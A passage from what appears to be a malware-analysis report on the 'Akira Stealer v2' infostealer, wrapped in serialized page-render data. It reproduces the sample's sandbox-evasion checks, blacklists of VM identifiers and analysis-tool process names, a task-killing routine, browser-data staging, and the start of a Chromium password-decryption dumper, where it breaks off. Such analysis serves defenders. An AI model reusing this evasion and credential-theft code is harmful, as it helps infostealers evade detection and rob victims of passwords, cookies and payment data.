True\n",[63,13064,13065,13069,13074,13079,13083,13088,13092,13096],{"__ignoreMap":65},[102,13066,13067],{"class":104,"line":105},[102,13068,12644],{},[102,13070,13071],{"class":104,"line":111},[102,13072,13073],{},"def checkHTTPSimulation() -> bool:\n",[102,13075,13076],{"class":104,"line":329},[102,13077,13078],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[102,13080,13081],{"class":104,"line":346},[102,13082,12807],{},[102,13084,13085],{"class":104,"line":650},[102,13086,13087],{},"        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n",[102,13089,13090],{"class":104,"line":656},[102,13091,12832],{},[102,13093,13094],{"class":104,"line":662},[102,13095,13043],{},[102,13097,13098],{"class":104,"line":668},[102,13099,13100],{},"    return True\n",[12,13102,13103],{},"This subtle approach tests the network path's integrity without triggering alarms or requiring dedicated infrastructure.",[186,13105,13107],{"id":13106},"_7310-registry-gpu-driver-check-detecting-virtual-gpu-signatures","7.3.10 Registry & GPU Driver Check – Detecting Virtual GPU Signatures",[12,13109,192],{},[12,13111,13112,13113,13116],{},"Certain virtual environments are betrayed by registry keys or GPU driver descriptors. Akira executes a dual strategy: it queries registry entries tied to the graphics subsystem, and separately examines the output of ",[63,13114,13115],{},"wmic"," for suspicious GPU strings.",[56,13118,13120],{"className":12155,"code":13119,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkRegistry() -> bool:\n    r1 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n        capture_output=True, shell=True)\n    r2 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n        capture_output=True, shell=True)\n\n    # GPU name check\n    gpu_out = subprocess.run(\n        \"wmic path win32_VideoController get name\",\n        capture_output=True, shell=True).stdout.decode().splitlines()\n    gpucheck = any(x in gpu_out[2].lower()\n                   for x in (\"virtualbox\", \"vmware\"))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[63,13121,13122,13126,13131,13136,13141,13146,13151,13156,13160,13164,13169,13174,13179,13184,13189,13194],{"__ignoreMap":65},[102,13123,13124],{"class":104,"line":105},[102,13125,12644],{},[102,13127,13128],{"class":104,"line":111},[102,13129,13130],{},"def checkRegistry() -> bool:\n",[102,13132,13133],{"class":104,"line":329},[102,13134,13135],{},"    r1 = subprocess.run(\n",[102,13137,13138],{"class":104,"line":346},[102,13139,13140],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[102,13142,13143],{"class":104,"line":650},[102,13144,13145],{},"        capture_output=True, shell=True)\n",[102,13147,13148],{"class":104,"line":656},[102,13149,13150],{},"    r2 = subprocess.run(\n",[102,13152,13153],{"class":104,"line":662},[102,13154,13155],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[102,13157,13158],{"class":104,"line":668},[102,13159,13145],{},[102,13161,13162],{"class":104,"line":674},[102,13163,11519],{"emptyLinePlaceholder":2181},[102,13165,13166],{"class":104,"line":680},[102,13167,13168],{},"    # GPU name check\n",[102,13170,13171],{"class":104,"line":12692},[102,13172,13173],{},"    gpu_out = subprocess.run(\n",[102,13175,13176],{"class":104,"line":12698},[102,13177,13178],{},"        \"wmic path win32_VideoController get name\",\n",[102,13180,13181],{"class":104,"line":12704},[102,13182,13183],{},"        capture_output=True, shell=True).stdout.decode().splitlines()\n",[102,13185,13186],{"class":104,"line":12710},[102,13187,13188],{},"    gpucheck = any(x in gpu_out[2].lower()\n",[102,13190,13191],{"class":104,"line":12716},[102,13192,13193],{},"                   for x in (\"virtualbox\", \"vmware\"))\n",[102,13195,13196],{"class":104,"line":12722},[102,13197,13198],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[12,13200,13201],{},"These hardware-layer checks are particularly effective against analyst setups that may not fully mask virtualized display adapters.",[186,13203,13205],{"id":13204},"_7311-task-killing-suppressing-analysis-tools-in-real-time","7.3.11 Task-Killing – Suppressing Analysis Tools in Real Time",[12,13207,192],{},[12,13209,13210],{},"Rather than only evading detection passively, Akira goes a step further by actively terminating known analysis or debugging tools. It spins off a background thread that iterates over a list of processes and kills any match it finds.",[56,13212,13214],{"className":12155,"code":13213,"language":12157,"meta":65,"style":65},"@staticmethod\ndef killTasks() -> None:\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n  # ... dozens more ...\n  'glasswire','requestly'\n)\n",[63,13215,13216,13220,13225,13230,13234,13239,13244,13249,13254],{"__ignoreMap":65},[102,13217,13218],{"class":104,"line":105},[102,13219,12644],{},[102,13221,13222],{"class":104,"line":111},[102,13223,13224],{},"def killTasks() -> None:\n",[102,13226,13227],{"class":104,"line":329},[102,13228,13229],{},"    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[102,13231,13232],{"class":104,"line":346},[102,13233,11519],{"emptyLinePlaceholder":2181},[102,13235,13236],{"class":104,"line":650},[102,13237,13238],{},"BLACKLISTED_TASKS = (\n",[102,13240,13241],{"class":104,"line":656},[102,13242,13243],{},"  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[102,13245,13246],{"class":104,"line":662},[102,13247,13248],{},"  # ... dozens more ...\n",[102,13250,13251],{"class":104,"line":668},[102,13252,13253],{},"  'glasswire','requestly'\n",[102,13255,13256],{"class":104,"line":674},[102,13257,12911],{},[12,13259,13260],{},"These tools—commonly used by incident responders and malware analysts—are neutralized before they can collect meaningful behavioral artifacts.",[12,13262,13263],{},[251,13264,4699],{},[12,13266,13267],{},"Akira uses a sophisticated suite of anti-analysis techniques that target multiple system layers — from environment variables and registry keys to network probes and task lists. These mechanisms are designed to detect and evade both automated sandboxes and manual inspection setups.",[12,13269,13270],{},"The combination of passive fingerprinting and active suppression (e.g., task killing) demonstrates how even mid-tier malware families now integrate multi-layer evasion logic.",[186,13272,13274],{"id":13273},"_7312-complete-blacklists-detection-functions","7.3.12 Complete Blacklists & Detection Functions",[12,13276,192],{},[12,13278,13279],{},[251,13280,13281],{},"Blacklisted Hardware UUIDs",[56,13283,13286],{"className":13284,"code":13285,"language":61},[59],"BLACKLISTED_UUIDS = (\n    '7AB5C494-39F5-4941-9163-47F54D6D5016',\n    '032E02B4-0499-05C3-0806-3C0700080009',\n    '03DE0294-0480-05DE-1A06-350700080009',\n    '11111111-2222-3333-4444-555555555555',\n    '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n    'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n    '4C4C4544-0050-3710-8058-CAC04F59344A',\n    '00000000-0000-0000-0000-AC1F6BD04972',\n    '00000000-0000-0000-0000-000000000000',\n    '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n    '49434D53-0200-9065-2500-65902500E439',\n    '49434D53-0200-9036-2500-36902500F022',\n    '777D84B3-88D1-451C-93E4-D235177420A7',\n    '49434D53-0200-9036-2500-369025000C65',\n    'B1112042-52E8-E25B-3655-6A4F54155DBF',\n    '00000000-0000-0000-0000-AC1F6BD048FE',\n    'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n    'A15A930C-8251-9645-AF63-E45AD728C20C',\n    '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n    'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n    '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n    '44B94D56-65AB-DC02-86A0-98143A7423BF',\n    '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n    'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n    '49434D53-0200-9036-2500-369025003AF0',\n    '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n    '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n    '79AF5279-16CF-4094-9758-F88A616D81B4',\n    'FE822042-A70C-D08B-F1D1-C207055A488F',\n    '76122042-C286-FA81-F0A8-514CC507B250',\n    '481E2042-A1AF-D390-CE06-A8F783B1E76A',\n    'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n    '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[63,13287,13285],{"__ignoreMap":65},[12,13289,13290],{},[251,13291,13292],{},"Blacklisted Computer Names",[56,13294,13297],{"className":13295,"code":13296,"language":61},[59],"BLACKLISTED_COMPUTERNAMES = (\n    '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n    'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n    'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n    'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n    'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n    'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n    'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n    'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[63,13298,13296],{"__ignoreMap":65},[12,13300,13301],{},[251,13302,13303],{},"Blacklisted User Accounts",[56,13305,13308],{"className":13306,"code":13307,"language":61},[59],"BLACKLISTED_USERS = (\n    'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n    'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n    'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n    'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n    'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[63,13309,13307],{"__ignoreMap":65},[12,13311,13312],{},[251,13313,13314],{},"Blacklisted Analysis‐Tool Processes",[56,13316,13319],{"className":13317,"code":13318,"language":61},[59],"BLACKLISTED_TASKS = (\n    'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n    'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n    'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n    'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n    'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n    'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice',\n    'discordtokenprotector', 'glasswire', 'requestly'\n)\n",[63,13320,13318],{"__ignoreMap":65},[12,13322,13323],{},[251,13324,13325],{},"Core Detection Methods",[56,13327,13329],{"className":12155,"code":13328,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkUUID() -> bool:\n    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\",\n            shell=True, capture_output=True\n        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n    \"\"\"Current login username in VM users list.\"\"\"\n    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET', 'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n    \"\"\"\n    Attempt TLS to random subdomain.\n    Failure → possible HTTPS interception/sandbox.\n    \"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n        return True\n    except:\n        return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n    \"\"\"\n    Look for VirtualBox/VMware in:\n    - Registry driver entries\n    - Video card name via WMIC\n    - Presence of VM-specific folders\n    \"\"\"\n    r1 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n        shell=True, capture_output=True\n    )\n    r2 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n        shell=True, capture_output=True\n    )\n    gpu = any(\n        x.lower() in subprocess.run(\n            \"wmic path win32_VideoController get name\",\n            shell=True, capture_output=True\n        ).stdout.decode().splitlines()[2].lower()\n        for x in (\"virtualbox\", \"vmware\")\n    )\n    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n    \"\"\"Continuously terminate known analysis processes.\"\"\"\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[63,13330,13331,13335,13339,13344,13348,13352,13357,13362,13367,13371,13375,13379,13383,13387,13391,13396,13401,13405,13409,13413,13418,13423,13427,13431,13435,13440,13445,13450,13455,13461,13466,13471,13476,13481,13486,13491,13497,13503,13509,13514,13519,13524,13529,13535,13540,13545,13550,13555,13560,13565,13571,13577,13583,13589,13594,13599,13605,13611,13617,13623,13628,13633,13639,13644,13649,13655,13661,13667,13672,13678,13684,13689,13695,13701,13706,13711,13716,13722],{"__ignoreMap":65},[102,13332,13333],{"class":104,"line":105},[102,13334,12644],{},[102,13336,13337],{"class":104,"line":111},[102,13338,12802],{},[102,13340,13341],{"class":104,"line":329},[102,13342,13343],{},"    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n",[102,13345,13346],{"class":104,"line":346},[102,13347,12807],{},[102,13349,13350],{"class":104,"line":650},[102,13351,12812],{},[102,13353,13354],{"class":104,"line":656},[102,13355,13356],{},"            \"wmic csproduct get uuid\",\n",[102,13358,13359],{"class":104,"line":662},[102,13360,13361],{},"            shell=True, capture_output=True\n",[102,13363,13364],{"class":104,"line":668},[102,13365,13366],{},"        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[102,13368,13369],{"class":104,"line":674},[102,13370,12832],{},[102,13372,13373],{"class":104,"line":680},[102,13374,12837],{},[102,13376,13377],{"class":104,"line":12692},[102,13378,12842],{},[102,13380,13381],{"class":104,"line":12698},[102,13382,11519],{"emptyLinePlaceholder":2181},[102,13384,13385],{"class":104,"line":12704},[102,13386,12644],{},[102,13388,13389],{"class":104,"line":12710},[102,13390,12872],{},[102,13392,13393],{"class":104,"line":12716},[102,13394,13395],{},"    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[102,13397,13398],{"class":104,"line":12722},[102,13399,13400],{},"    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[102,13402,13403],{"class":104,"line":12728},[102,13404,11519],{"emptyLinePlaceholder":2181},[102,13406,13407],{"class":104,"line":12734},[102,13408,12644],{},[102,13410,13411],{"class":104,"line":12740},[102,13412,12937],{},[102,13414,13415],{"class":104,"line":12746},[102,13416,13417],{},"    \"\"\"Current login username in VM users list.\"\"\"\n",[102,13419,13420],{"class":104,"line":12752},[102,13421,13422],{},"    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n",[102,13424,13425],{"class":104,"line":12758},[102,13426,11519],{"emptyLinePlaceholder":2181},[102,13428,13429],{"class":104,"line":12764},[102,13430,12644],{},[102,13432,13433],{"class":104,"line":12770},[102,13434,13005],{},[102,13436,13437],{"class":104,"line":12776},[102,13438,13439],{},"    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n",[102,13441,13443],{"class":104,"line":13442},26,[102,13444,13010],{},[102,13446,13448],{"class":104,"line":13447},27,[102,13449,12807],{},[102,13451,13453],{"class":104,"line":13452},28,[102,13454,13019],{},[102,13456,13458],{"class":104,"line":13457},29,[102,13459,13460],{},"            'GET', 'http://ip-api.com/line/?fields=hosting'\n",[102,13462,13464],{"class":104,"line":13463},30,[102,13465,13034],{},[102,13467,13469],{"class":104,"line":13468},31,[102,13470,12832],{},[102,13472,13474],{"class":104,"line":13473},32,[102,13475,13043],{},[102,13477,13479],{"class":104,"line":13478},33,[102,13480,11519],{"emptyLinePlaceholder":2181},[102,13482,13484],{"class":104,"line":13483},34,[102,13485,12644],{},[102,13487,13489],{"class":104,"line":13488},35,[102,13490,13073],{},[102,13492,13494],{"class":104,"line":13493},36,[102,13495,13496],{},"    \"\"\"\n",[102,13498,13500],{"class":104,"line":13499},37,[102,13501,13502],{},"    Attempt TLS to random subdomain.\n",[102,13504,13506],{"class":104,"line":13505},38,[102,13507,13508],{},"    Failure → possible HTTPS interception/sandbox.\n",[102,13510,13512],{"class":104,"line":13511},39,[102,13513,13496],{},[102,13515,13517],{"class":104,"line":13516},40,[102,13518,13078],{},[102,13520,13522],{"class":104,"line":13521},41,[102,13523,12807],{},[102,13525,13527],{"class":104,"line":13526},42,[102,13528,13087],{},[102,13530,13532],{"class":104,"line":13531},43,[102,13533,13534],{},"        return True\n",[102,13536,13538],{"class":104,"line":13537},44,[102,13539,12832],{},[102,13541,13543],{"class":104,"line":13542},45,[102,13544,13043],{},[102,13546,13548],{"class":104,"line":13547},46,[102,13549,11519],{"emptyLinePlaceholder":2181},[102,13551,13553],{"class":104,"line":13552},47,[102,13554,12644],{},[102,13556,13558],{"class":104,"line":13557},48,[102,13559,13130],{},[102,13561,13563],{"class":104,"line":13562},49,[102,13564,13496],{},[102,13566,13568],{"class":104,"line":13567},50,[102,13569,13570],{},"    Look for VirtualBox/VMware in:\n",[102,13572,13574],{"class":104,"line":13573},51,[102,13575,13576],{},"    - Registry driver entries\n",[102,13578,13580],{"class":104,"line":13579},52,[102,13581,13582],{},"    - Video card name via WMIC\n",[102,13584,13586],{"class":104,"line":13585},53,[102,13587,13588],{},"    - Presence of VM-specific folders\n",[102,13590,13592],{"class":104,"line":13591},54,[102,13593,13496],{},[102,13595,13597],{"class":104,"line":13596},55,[102,13598,13135],{},[102,13600,13602],{"class":104,"line":13601},56,[102,13603,13604],{},"        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n",[102,13606,13608],{"class":104,"line":13607},57,[102,13609,13610],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n",[102,13612,13614],{"class":104,"line":13613},58,[102,13615,13616],{},"        shell=True, capture_output=True\n",[102,13618,13620],{"class":104,"line":13619},59,[102,13621,13622],{},"    )\n",[102,13624,13626],{"class":104,"line":13625},60,[102,13627,13150],{},[102,13629,13631],{"class":104,"line":13630},61,[102,13632,13604],{},[102,13634,13636],{"class":104,"line":13635},62,[102,13637,13638],{},"        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n",[102,13640,13642],{"class":104,"line":13641},63,[102,13643,13616],{},[102,13645,13647],{"class":104,"line":13646},64,[102,13648,13622],{},[102,13650,13652],{"class":104,"line":13651},65,[102,13653,13654],{},"    gpu = any(\n",[102,13656,13658],{"class":104,"line":13657},66,[102,13659,13660],{},"        x.lower() in subprocess.run(\n",[102,13662,13664],{"class":104,"line":13663},67,[102,13665,13666],{},"            \"wmic path win32_VideoController get name\",\n",[102,13668,13670],{"class":104,"line":13669},68,[102,13671,13361],{},[102,13673,13675],{"class":104,"line":13674},69,[102,13676,13677],{},"        ).stdout.decode().splitlines()[2].lower()\n",[102,13679,13681],{"class":104,"line":13680},70,[102,13682,13683],{},"        for x in (\"virtualbox\", \"vmware\")\n",[102,13685,13687],{"class":104,"line":13686},71,[102,13688,13622],{},[102,13690,13692],{"class":104,"line":13691},72,[102,13693,13694],{},"    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n",[102,13696,13698],{"class":104,"line":13697},73,[102,13699,13700],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n",[102,13702,13704],{"class":104,"line":13703},74,[102,13705,11519],{"emptyLinePlaceholder":2181},[102,13707,13709],{"class":104,"line":13708},75,[102,13710,12644],{},[102,13712,13714],{"class":104,"line":13713},76,[102,13715,13224],{},[102,13717,13719],{"class":104,"line":13718},77,[102,13720,13721],{},"    \"\"\"Continuously terminate known analysis processes.\"\"\"\n",[102,13723,13725],{"class":104,"line":13724},78,[102,13726,13229],{},[186,13728,13730],{"id":13729},"_7313-execution-abort-logic","7.3.13 Execution & Abort Logic",[12,13732,192],{},[3259,13734,13735,13749,13762],{},[1257,13736,13737,13740,13741,13744,13745,13748],{},[251,13738,13739],{},"Initialization:"," Within the ",[63,13742,13743],{},"Akira.__init__()"," constructor, the malware immediately invokes ",[63,13746,13747],{},"VmProtect.isVM(1)"," to perform quick, low-overhead virtualization checks (e.g., hostname, user, HTTPS simulation).",[1257,13750,13751,13754,13755,13758,13759,13761],{},[251,13752,13753],{},"Deep Inspection:"," If the initial test passes, it calls ",[63,13756,13757],{},"VmProtect.isVM(2)",", triggering more comprehensive checks, including hardware UUID validation, hosting detection via ",[63,13760,12990],{},", and registry artifact scanning.",[1257,13763,13764,13767,13768,13770,13771,13773],{},[251,13765,13766],{},"Abort Path:"," If any check returns ",[63,13769,12332],{},", indicating a virtual or analysis environment, the code executes ",[63,13772,12336],{},", terminating execution before any data collection or exfiltration routines.",[186,13775,13777],{"id":13776},"_7314-conclusion","7.3.14 Conclusion",[12,13779,192],{},[12,13781,399,13782,13784,13785,13787],{},[63,13783,12280],{}," module in ",[3456,13786,8365],{}," demonstrates a layered defense against analysis, leveraging both local system fingerprints and network-based heuristics. By understanding and instrumenting these precise checks, defenders can turn the tables and detect such evasive malware in operational environments.",[41,13789,13791],{"id":13790},"_74-browser-data-exfiltration","7.4 Browser Data Exfiltration",[12,13793,47],{},[12,13795,13796,13797,2901,13800,13803],{},"One of the core objectives of Akira Stealer v2 is the large-scale extraction of sensitive browser-stored data. The malware implements tailored modules to target both ",[251,13798,13799],{},"Chromium-based",[251,13801,13802],{},"Gecko-based (Firefox)"," browsers. Its capabilities include the extraction and decryption of saved passwords, cookies, credit card data, autofill entries, and even session tokens that can be repurposed for full account hijacking.",[12,13805,13806],{},[251,13807,13808],{},"1. Workspace Setup",[56,13810,13812],{"className":12155,"code":13811,"language":12157,"meta":65,"style":65},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\nos.makedirs(client_dir, exist_ok=True)\nfor sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[63,13813,13814,13819,13824,13829],{"__ignoreMap":65},[102,13815,13816],{"class":104,"line":105},[102,13817,13818],{},"client_dir = Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[102,13820,13821],{"class":104,"line":111},[102,13822,13823],{},"os.makedirs(client_dir, exist_ok=True)\n",[102,13825,13826],{"class":104,"line":329},[102,13827,13828],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[102,13830,13831],{"class":104,"line":346},[102,13832,13833],{},"    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[1254,13835,13836,13843,13846,13849,13852],{},[1257,13837,13838,13839],{},"Creates a disposable staging area under the system temp directory, named after the victim’s machine (%TEMP%\\DESKTOP-",[13840,13841,13842],"hostname",{},"), ensuring all exfiltrated artifacts are consolidated in one easily archiveable location.",[1257,13844,13845],{},"Isolates data by type: six dedicated subfolders (Passwords, Cookies, CreditCards, History, Autofill, Wallets) prevent naming collisions and simplify later zipping—each extraction routine writes only into its own folder.",[1257,13847,13848],{},"Idempotent directory creation uses exist_ok=True so if the malware re-runs (e.g., on reboot or persistence), it won’t crash or overwrite existing data—new items simply append into the same structure.",[1257,13850,13851],{},"Facilitates selective cleanup: once upload and notification are complete, the stealer can call Utils.clear_client_folder() to recursively delete only its own workspace, leaving no residual files behind.",[1257,13853,13854],{},"Sets the stage for parallel extraction threads: by pre-creating all targets, background threads harvesting browser credentials, cookies, autofills, crypto-wallet data, etc., can immediately write results without additional checks, minimizing overhead and reducing the window for defensive hooks to detect unexpected file I/O.",[12,13856,13857],{},[251,13858,13859],{},"2. Supported Browsers",[1254,13861,13862,13905],{},[1257,13863,13864,13867],{},[251,13865,13866],{},"Chromium‑based",[1254,13868,13869,13872,13875,13878,13881,13884,13887,13890,13893,13896,13899,13902],{},[1257,13870,13871],{},"Google Chrome (Stable & SxS)",[1257,13873,13874],{},"Microsoft Edge",[1257,13876,13877],{},"Brave Browser",[1257,13879,13880],{},"Opera & Opera GX",[1257,13882,13883],{},"Chromium",[1257,13885,13886],{},"Comodo Dragon",[1257,13888,13889],{},"Epic Privacy Browser",[1257,13891,13892],{},"Iridium Browser",[1257,13894,13895],{},"UR Browser",[1257,13897,13898],{},"Vivaldi Browser",[1257,13900,13901],{},"Yandex Browser",[1257,13903,13904],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Uran",[1257,13906,13907,13910,13911,1288,13914,13925,13927,13928,13937,13939,13940,805,13943,13946],{},[251,13908,13909],{},"Firefox‑based"," (via ",[63,13912,13913],{},"GeckoDriver",[1254,13915,13916,13919,13922],{},[1257,13917,13918],{},"Mozilla Firefox",[1257,13920,13921],{},"Waterfox",[1257,13923,13924],{},"Pale Moon",[531,13926],{},"Akira dynamically locates user profiles using environment variables and well-known directory structures:",[56,13929,13931],{"className":12155,"code":13930,"language":12157,"meta":65,"style":65},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[63,13932,13933],{"__ignoreMap":65},[102,13934,13935],{"class":104,"line":105},[102,13936,13930],{},[531,13938],{},"It recursively checks for available browser profiles (e.g. ",[63,13941,13942],{},"Default",[63,13944,13945],{},"Profile 1",", etc.) and targets SQLite databases within those paths.",[186,13948,13950],{"id":13949},"_741-data-types-extracted","7.4.1 Data Types Extracted",[12,13952,192],{},[417,13954,420,13955],{"style":12346},[438,13956,13957,420,13970,420,13983,420,13995,420,14007,420,14019,420,14030],{},[426,13958,424,13959,424,13963,424,13967,420],{},[430,13960,13962],{"style":13961},"text-align: left; width: 22%;","Data Type",[430,13964,13966],{"style":13965},"text-align: left; width: 28%;","Source File",[430,13968,13969],{"style":12514},"Notes",[426,13971,424,13972,424,13975,424,13980,420],{},[443,13973,13974],{},"Saved Passwords",[443,13976,13977,13979],{},[63,13978,8280],{}," (Chromium)",[443,13981,13982],{},"Decrypted via DPAPI or AES-GCM (post Chromium v80)",[426,13984,424,13985,424,13988,424,13992,420],{"style":12370},[443,13986,13987],{},"Cookies",[443,13989,13990],{},[63,13991,13987],{},[443,13993,13994],{},"Can include session tokens, especially for Google/Facebook accounts",[426,13996,424,13997,424,14000,424,14004,420],{},[443,13998,13999],{},"Autofill Data",[443,14001,14002],{},[63,14003,8283],{},[443,14005,14006],{},"Addresses, emails, phone numbers, etc.",[426,14008,424,14009,424,14012,424,14016,420],{"style":12370},[443,14010,14011],{},"Credit Cards",[443,14013,14014],{},[63,14015,8283],{},[443,14017,14018],{},"Encrypted; requires master key",[426,14020,424,14021,424,14024,424,14027,420],{},[443,14022,14023],{},"Session Tokens",[443,14025,14026],{},"In-memory & cookies",[443,14028,14029],{},"Includes Gmail, Google accounts, and Discord OAUTH replay",[426,14031,424,14032,424,14035,424,14043,420],{"style":12370},[443,14033,14034],{},"History & URLs",[443,14036,14037,805,14040],{},[63,14038,14039],{},"History",[63,14041,14042],{},"Visited Links",[443,14044,14045],{},"Were also exfiltrated to the attacker",[52,14047],{"className":14048},[8535,8536],[12,14050,14051,14054],{},[251,14052,14053],{},"3. Extraction Modules","\nWhen malware authors target browsers, their primary treasure troves are the various SQLite databases where Chrome, Firefox, and their kin store credentials, cookies, history, and autofill entries. astor.py stitches together lightweight Python and native APIs to methodically pluck every piece of data—and even replay live OAuth sessions—without leaving a trace. Below is an in-depth, module-by-module tour, verbatim from the code.",[186,14056,14058,14059,1288],{"id":14057},"_742-password-dumper-chromiumgetpasswords","7.4.2 Password Dumper (",[63,14060,14061],{},"Chromium.GetPasswords",[12,14063,192],{},[12,14065,14066],{},"This module systematically searches through all Chromium-based browser profiles to extract saved login credentials. By targeting the Login Data SQLite database, it retrieves usernames and encrypted passwords, then uses the platform’s encryption key (retrieved via DPAPI or AES-GCM) to decrypt them into cleartext. These credentials are highly valuable for post-compromise pivoting or account takeover.",[56,14068,14070],{"className":12155,"code":14069,"language":12157,"meta":65,"style":65},"for root, _, files in os.walk(self.BrowserPath):\n    for file in files:\n        if file.lower() == \"login data\":\n            # Copy DB → open → extract rows\n            results = cursor.execute(\n                \"SELECT origin_url, username_value, password_value FROM logins\"\n            ).fetchall()\n            for url, user, pwd_blob in results:\n                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n                passwords.append((url, user, 